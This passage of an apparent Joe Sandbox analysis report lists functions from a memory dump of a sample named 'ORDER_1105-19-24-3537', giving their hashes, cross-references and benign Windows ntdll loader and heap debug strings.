String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
Instruction ID: 2beaacda1fadfe62b963978a5dab22eee1708115b79464e24b0d84be65f08692
Opcode Fuzzy Hash: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
Instruction Fuzzy Hash: CC519171208305AFEB2DDF24D845BAB77E8FB84648F00492DE59597194E734EA44CB93

Function 01172674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011B219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011B2180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011B2178
RtlGetAssemblyStorageRoot, xrefs: 011B2160, 011B219A, 011B21BA
SXS: %s() passed the empty activation context, xrefs: 011B2165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011B21BF

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
Instruction ID: f8cc2e2e5ceb6e3c2ba68e1df5619b0dc3d973aabefa0f0ed59074d2ae4ccbb2
Opcode Fuzzy Hash: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
Instruction Fuzzy Hash: 8C31FB36F4022577F72D8A998C86F9BBB79DB75A90F05405DFB04B7241D370AA02C7A1

Function 0117C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 0117C6C3
LdrpInitializeImportRedirection, xrefs: 011B8177, 011B81EB
minkernel\ntdll\ldrredirect.c, xrefs: 011B8181, 011B81F5
Loading import redirection DLL: '%wZ', xrefs: 011B8170
LdrpInitializeProcess, xrefs: 0117C6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 011B81E5

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
Instruction ID: 65e6007e50023a77f4a2600a0ecb46e951c06d7976bd8484261e4e173f589800
Opcode Fuzzy Hash: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
Instruction Fuzzy Hash: 5631F571644346AFD21CEF29D886F5A77E8EF94B18F04055CF944AB391E720ED04CBA2

Function 0118096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01182DF0: LdrInitializeThunk.NTDLL ref: 01182DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D74

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
Instruction ID: 0ea613a75771d0ce09003bd1c7241e3604afd231a4843f1312b0ee1184b8f5a9
Opcode Fuzzy Hash: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
Instruction Fuzzy Hash: DE427D71900719DFDB69DF28C880BEAB7F4BF48304F1485A9E989DB241E770A985CF61

Function 0114A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0114A3EF
6, xrefs: 0114A3F7
LdrResFallbackLangList Exit, xrefs: 0114A3FF
8, xrefs: 0114A3E7

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
Instruction ID: b77db27a0d16c4efe650ac20fb7a555480fd41aeca44d3881e5b0ce9f5aec3fc
Opcode Fuzzy Hash: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
Instruction Fuzzy Hash: F6C1AD75148382CFD719CF58D144B6ABBE4FF84B04F0A886AF9968B251E734C949CB93

Function 01178402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01178421
@, xrefs: 01178591
LdrpInitializeProcess, xrefs: 01178422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0117855E

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
Instruction ID: 0cc9c0e623cb9648a0485771a7bb96694d86de721431af12dbb8e28fec40e51a
Opcode Fuzzy Hash: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
Instruction Fuzzy Hash: 96918E71508345AFD72AEF65CC84FABBAECBF84744F40492EFA8492251E770D944CB62

Function 0117273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011B21D9, 011B22B1
.Local, xrefs: 011728D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011B22B6
SXS: %s() passed the empty activation context, xrefs: 011B21DE

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
Instruction ID: daf5065e9f4b46fb99c2377e4d136b352bf7d44da9a9bc9135cf24b9ea346de2
Opcode Fuzzy Hash: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
Instruction Fuzzy Hash: B1A1A131900229DBDB2DCF68C884BE9B7B1BF58354F1941E9D908A7351E730AE86CF91

Function 01174AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011B3456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 011B342A
RtlDeactivateActivationContext, xrefs: 011B3425, 011B3432, 011B3451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011B3437

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: c7af0fa997a88756fd8c5714edb23563e01e03d2b6937c0b400d24e380a586cd
Instruction ID: 1c6573eda8cfbaad398533882460ac64281555a96e7e041a35aea2fb82dcbb49
Opcode Fuzzy Hash: c7af0fa997a88756fd8c5714edb23563e01e03d2b6937c0b400d24e380a586cd
Instruction Fuzzy Hash: 78612132610B129FD72ECF1CC881B7AB7E1BF90B50F158529E8659B740DB34E811CB91

Function 011464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011A0FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011A106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011A10AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011A1028

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
Instruction ID: af60f0beddf2ab8bf0f54582d4f65d9741a1447226de04cf5f50f44b571e1be6
Opcode Fuzzy Hash: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
Instruction Fuzzy Hash: 6871F2B1904345AFCB25EF14C884B977FA9AF95BA8F400468F9488B146D334D589CFD2

Function 01174D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011B362F
minkernel\ntdll\ldrsnap.c, xrefs: 011B3640, 011B366C
LdrpFindDllActivationContext, xrefs: 011B3636, 011B3662
Querying the active activation context failed with status 0x%08lx, xrefs: 011B365C

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 58b3c0bba0a55928556a4f1a59063b8df05e6f90ea43f1955366bb68a5798628
Instruction ID: 26ed4d1f34b2bf9a83635b19f34ec1759fb59999136a5dc6df939862e5b77252
Opcode Fuzzy Hash: 58b3c0bba0a55928556a4f1a59063b8df05e6f90ea43f1955366bb68a5798628
Instruction Fuzzy Hash: B4312932900251AEEF3EEA4CD888BBDB6B8FB21754F06402AE99457B51D7A09D8087D5

Function 0116245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 011AA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011AA992
apphelp.dll, xrefs: 01162462
LdrpDynamicShimModule, xrefs: 011AA998

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
Instruction ID: 90179b60e5f43f77ff011686619fb6e94bfa24dc02cf1535bf96dc5bca196c32
Opcode Fuzzy Hash: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
Instruction Fuzzy Hash: 67314A75A00302EBDB3DDF5DF849AAA7BB8FF84B04F560019E9016B245D7B09A51C780

Function 011529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01153255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0115327D
HEAP: , xrefs: 01153264

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
Instruction ID: 30b106aeb0594844bc1be1afcf5382d15366eb4470cb0e781840db42d4839b26
Opcode Fuzzy Hash: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
Instruction Fuzzy Hash: 0D92CD71A04649DFDB69CF68C444BAEBBF1FF48304F188099E869AB392D735A941CF50

Function 01150770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 011A50AE
(UCRBlock->Size >= *Size), xrefs: 011A50CA
HEAP: , xrefs: 011A50BD

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
Instruction ID: db1c5803d1f09615b81dcc20321786901511def1105587d2025faa09cfe240f9
Opcode Fuzzy Hash: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
Instruction Fuzzy Hash: CFF1CF34A04606DFDB5DCFA8C894F6ABBB2FF48304F154169E8269B385D730E981CB51

Function 01166962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01166C24
, xrefs: 011ACA51

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
Instruction ID: 25b0c107251edd5e85a15c9d4409c9d08786f6f2b264978d128ae399fe147692
Opcode Fuzzy Hash: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
Instruction Fuzzy Hash: 72C290716083419FE72DCF28C840BABBBE9BF88758F05892DE989C7241D735D855CB92

Function 0113A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0119C2E6
UseFilter, xrefs: 0113A1C1
\??\, xrefs: 0119C1E4

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
Instruction ID: d77fd4eb2d43b743ef2a8ce176eb722d71ac0023582c689684abf198f92a7ad9
Opcode Fuzzy Hash: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
Instruction Fuzzy Hash: EAA15B719112299BDF39DF28CC88BEAB7B8EF48704F1041E9E958A7250D7359E84CF90

Function 01160BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 011AA117
minkernel\ntdll\ldrinit.c, xrefs: 011AA121
Failed to allocated memory for shimmed module list, xrefs: 011AA10F

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
Instruction ID: f76b9eec6cfdab87bb681e555d9102d476372708040891c6b5e54b458ab83c50
Opcode Fuzzy Hash: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
Instruction Fuzzy Hash: 5571F074A00205EFDB2DDF68D984ABEBBF8FF48204F04446DE8029B245E735AE51CB41

Function 01150A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 011A534D
HEAP[%wZ]: , xrefs: 011A5335
HEAP: , xrefs: 011A5342

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
Instruction ID: 9abeb2f69266cfedd0ff905cfeaf06d1a2ddb08d38932febca4b63b87dcfe92e
Opcode Fuzzy Hash: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
Instruction Fuzzy Hash: 6F61BE74604301DFDB6DCF68C480B6ABBE2FF89704F158559F8698B296D770E881CB91

Function 0117C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 011B82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 011B82DE
Failed to reallocate the system dirs string !, xrefs: 011B82D7

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
Instruction ID: 6c86270ae5ee9d3f86b4c527d954710f4a0e77c5d4d58d8ad292368f539f0ffd
Opcode Fuzzy Hash: 593150fc7f405544b91458ca174ba93b21c003da5bb5d12c9b1b169fcff582ad
Instruction Fuzzy Hash: 7F411372554702EBD729EB68E845B9BBBECEF45B54F00492AF948D3250EB74D800CBD2

Function 011FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011FC1C5
PreferredUILanguages, xrefs: 011FC212
@, xrefs: 011FC1F1

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
Instruction ID: 1b5f7670c602cd51c03118da4efbf69a393beeecf37a323bf6611c07a0b27842
Opcode Fuzzy Hash: a6088dd2c3526a442ba918b85a2857662745cad1ba0ee32ca02a6215c0b5774e
Instruction Fuzzy Hash: CC418275E0020DEBDF19DAD8C841FEEBBB9EB14704F04406EEA19B7240D7749A44DB90

Function 011D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 011D4160
@, xrefs: 011D4225
LdrpResValidateFilePath Exit, xrefs: 011D4172

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
Instruction ID: 39642bdc511ba74952db17cdd63eb146c0cb36bf1c94abc2f11b4139368fc543
Opcode Fuzzy Hash: edd9b2bdf60c6fa9620c13f93b5df97407fb7cb71f1f68389b8438cafdc80bef
Instruction Fuzzy Hash: F2414232A00259CBEB2EDBE8D840BADBBB8FF65384F15045AD911EBF81D7349901CB11

Function 011C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 011C488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011C4888
minkernel\ntdll\ldrredirect.c, xrefs: 011C4899

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
Instruction ID: a7e9643994b699b211b00d367b4f4a4e838b3e0acebd5f5047f3816bccf18cd0
Opcode Fuzzy Hash: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
Instruction Fuzzy Hash: 5C41D432A187519FCB29CF9CD860A27BBE4EF69E50B06056DED88D7B55D730D800CB92

Function 01150BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 011A5449
HEAP[%wZ]: , xrefs: 011A5431
HEAP: , xrefs: 011A543E

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
Instruction ID: e360334c51eedad71632eccae24a0154cdb627cd8a4b96f352c62915159d3817
Opcode Fuzzy Hash: 33eae89813c088181a0b67398d8f2f5b16e87a51e958bca7a19ed723732f2f54
Instruction Fuzzy Hash: 58113335318102DFDBADCA18C485B7ABBA6EF84719F1A812DF816CB256FB30D840C756

Function 011C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 011C2104
Process initialization failed with status 0x%08lx, xrefs: 011C20F3
LdrpInitializationFailure, xrefs: 011C20FA

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
Instruction ID: 3c75daf45dacef739d0c8241d7179115152aea7824a12b9b78a82ef9f3d4236f
Opcode Fuzzy Hash: ff72e556b7e4c78cb8ca18d3d50fc154fb496650df6b9e8e841b030b346a6343
Instruction Fuzzy Hash: C5F0C235640319BBE72CEA4DEC46F993BA8EB91F58F50006DF60077685E7F0AA10CA91

Function 011503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 011A4D8A

Strings

#%u, xrefs: 011A4D82

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
Instruction ID: b65694c337e1020fb1abddb8a4a86f7de66f72dafbc82d03a73564ba8b1410b5
Opcode Fuzzy Hash: dd110ca5632f1ead36b0c15754322c3712efa593b949a7a077168a00e0ca77a3
Instruction Fuzzy Hash: F2716871A0014ADFDB09DFA8C980BAEBBF8FF18744F154065E915A7251EB74EE01CBA1

Function 0114A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0114AA13
LdrResSearchResource Exit, xrefs: 0114AA25

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
Instruction ID: a2b7e1f9c075e317a956f4714a7b8a6890b0f95e9e808bb7d2be95d327b7eedc
Opcode Fuzzy Hash: 52a483b6dbf4677b258f90266ae50b5a80caa94ff6aa28301d438d8542e50d68
Instruction Fuzzy Hash: AEE19275E802199FEB2ECF98D980BAEBBB9FF44714F12442AE912E7241D734D940CB51

Function 0120A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0120A551
`, xrefs: 0120A44B

Memory Dump Source

Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
